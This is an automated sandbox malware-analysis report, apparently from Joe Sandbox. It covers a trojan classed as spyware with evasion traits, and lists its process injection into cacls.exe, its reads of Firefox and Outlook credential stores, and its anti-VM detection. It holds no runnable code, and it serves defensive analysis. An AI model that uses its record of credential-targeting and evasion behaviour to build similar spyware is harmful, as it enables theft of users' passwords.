Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FED5B0	6_2_02FED5B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FFDAC6	6_2_02FFDAC6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FEDAAC	6_2_02FEDAAC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F95AA0	6_2_02F95AA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FF1AA3	6_2_02FF1AA3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300FB76	6_2_0300FB76
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FC3A6C	6_2_02FC3A6C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F8DBF9	6_2_02F8DBF9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FC5BF0	6_2_02FC5BF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_03007A46	6_2_03007A46
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300FA49	6_2_0300FA49
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F6FB80	6_2_02F6FB80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F538E0	6_2_02F538E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FBD800	6_2_02FBD800
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F59950	6_2_02F59950
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F6B950	6_2_02F6B950
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FE5910	6_2_02FE5910
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300FF09	6_2_0300FF09
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F59EB0	6_2_02F59EB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300FFB1	6_2_0300FFB1
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F13FD2	6_2_02F13FD2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F13FD5	6_2_02F13FD5
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F51F92	6_2_02F51F92
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_03001D5A	6_2_03001D5A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_03007D73	6_2_03007D73
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02FC9C32	6_2_02FC9C32
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F6FDC0	6_2_02F6FDC0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F53D40	6_2_02F53D40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0300FCF2	6_2_0300FCF2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_00632020	6_2_00632020
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062CED0	6_2_0062CED0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062D0F0	6_2_0062D0F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062B0D0	6_2_0062B0D0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062B269	6_2_0062B269
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062B220	6_2_0062B220
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062B217	6_2_0062B217
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_00635700	6_2_00635700
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_00633900	6_2_00633900
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0064BEC0	6_2_0064BEC0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DB52C4	6_2_02DB52C4
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAE288	6_2_02DAE288
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAE3AB	6_2_02DAE3AB
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAE743	6_2_02DAE743
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DB5455	6_2_02DB5455
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DACAC3	6_2_02DACAC3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAD808	6_2_02DAD808

Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 02F97E54 appears 109 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 02F3B970 appears 283 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 02FBEA12 appears 86 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 02FCF290 appears 105 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 02F85130 appears 58 times
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: String function: 0110F290 appears 105 times
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: String function: 010C5130 appears 58 times
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: String function: 010FEA12 appears 86 times
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: String function: 0107B970 appears 283 times
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: String function: 010D7E54 appears 100 times

Source: zAg7xx1vKI.exe, 00000000.00000002.1339414664.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000000.00000002.1340145694.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000000.00000002.1343900020.0000000006F20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000000.00000000.1297897238.000000000070E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePARpE.exe< vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000000.00000002.1343184734.0000000005660000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000000.00000002.1341155638.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000003.00000002.1882900814.000000000117D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000003.00000002.1882467034.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCACLS.EXEj% vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe, 00000003.00000002.1882467034.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCACLS.EXEj% vs zAg7xx1vKI.exe
Source: zAg7xx1vKI.exe	Binary or memory string: OriginalFilenamePARpE.exe< vs zAg7xx1vKI.exe

Source: zAg7xx1vKI.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: zAg7xx1vKI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@5/4

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zAg7xx1vKI.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\cacls.exe

File created: C:\Users\user\AppData\Local\Temp\t577G2K6

Jump to behavior

Source: zAg7xx1vKI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: zAg7xx1vKI.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cacls.exe, 00000006.00000002.2554437733.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.2554437733.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.2072181036.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.2069743170.0000000002A55000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: zAg7xx1vKI.exe	ReversingLabs: Detection: 71%
Source: zAg7xx1vKI.exe	Virustotal: Detection: 81%

Source: unknown	Process created: C:\Users\user\Desktop\zAg7xx1vKI.exe "C:\Users\user\Desktop\zAg7xx1vKI.exe"
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process created: C:\Users\user\Desktop\zAg7xx1vKI.exe "C:\Users\user\Desktop\zAg7xx1vKI.exe"
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process created: C:\Users\user\Desktop\zAg7xx1vKI.exe "C:\Users\user\Desktop\zAg7xx1vKI.exe"	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: zAg7xx1vKI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zAg7xx1vKI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: zAg7xx1vKI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: cacls.pdbGCTL source: zAg7xx1vKI.exe, 00000003.00000002.1882467034.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, vMBXKWKIWTv.exe, 00000005.00000002.2554600267.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cacls.pdb source: zAg7xx1vKI.exe, 00000003.00000002.1882467034.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, vMBXKWKIWTv.exe, 00000005.00000002.2554600267.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vMBXKWKIWTv.exe, 00000005.00000000.1804818926.0000000000B6E000.00000002.00000001.01000000.0000000C.sdmp, vMBXKWKIWTv.exe, 00000009.00000000.1952966150.0000000000B6E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: zAg7xx1vKI.exe, 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.1882414935.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.1884708088.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: zAg7xx1vKI.exe, zAg7xx1vKI.exe, 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000006.00000003.1882414935.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.1884708088.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: PARpE.pdbSHA256 source: zAg7xx1vKI.exe
Source:	Binary string: PARpE.pdb source: zAg7xx1vKI.exe

Source: zAg7xx1vKI.exe

Static PE information: 0xABD22D69 [Sat May 7 07:55:21 2061 UTC]

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_056A4C20 push 08418B05h; ret	0_2_056A4C33
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F1F1A8 pushfd ; ret	0_2_06F1F1A9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 0_2_06F16EAA push eax; ret	0_2_06F16EAD
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_004148D4 push cs; iretd	3_2_004148D7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0042E1F3 push edi; ret	3_2_0042E1FC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00419391 push cs; retf	3_2_00419392
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0040AD51 push ebx; retf	3_2_0040AD54
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00411D86 push ds; retf	3_2_00411D9F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0040ADAF push ebx; retf	3_2_0040AD54
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_004035B0 push eax; ret	3_2_004035B2
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_00404E90 push eax; ret	3_2_00404EA9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010809AD push ecx; mov dword ptr [esp], ecx	3_2_010809B6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F1225F pushad ; ret	6_2_02F127F9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F127FA pushad ; ret	6_2_02F127F9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F1283D push eax; iretd	6_2_02F12858
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F409AD push ecx; mov dword ptr [esp], ecx	6_2_02F409B6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02F11344 push eax; iretd	6_2_02F11369
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062E7D3 push ds; retf	6_2_0062E7EC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_00638844 push FFFFFF8Ah; ret	6_2_00638859
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0064AC40 push edi; ret	6_2_0064AC49
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_006277FC push ebx; retf	6_2_006277A1
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0062779E push ebx; retf	6_2_006277A1
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_006218DD push eax; ret	6_2_006218F6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0063DD41 push ds; iretd	6_2_0063DD5C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_00635DDE push cs; retf	6_2_00635DDF
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_0063BE41 push ss; iretd	6_2_0063BE42
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAF27F push esi; iretd	6_2_02DAF295
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DA622A push AC5E5B55h; retf	6_2_02DA6253
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DAF3C7 push edx; ret	6_2_02DAF3D3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DB23B2 push esi; ret	6_2_02DB23B3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 6_2_02DA43B7 push ebx; retf	6_2_02DA43BC

Source: zAg7xx1vKI.exe

Static PE information: section name: .text entropy: 7.256325564586632

Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

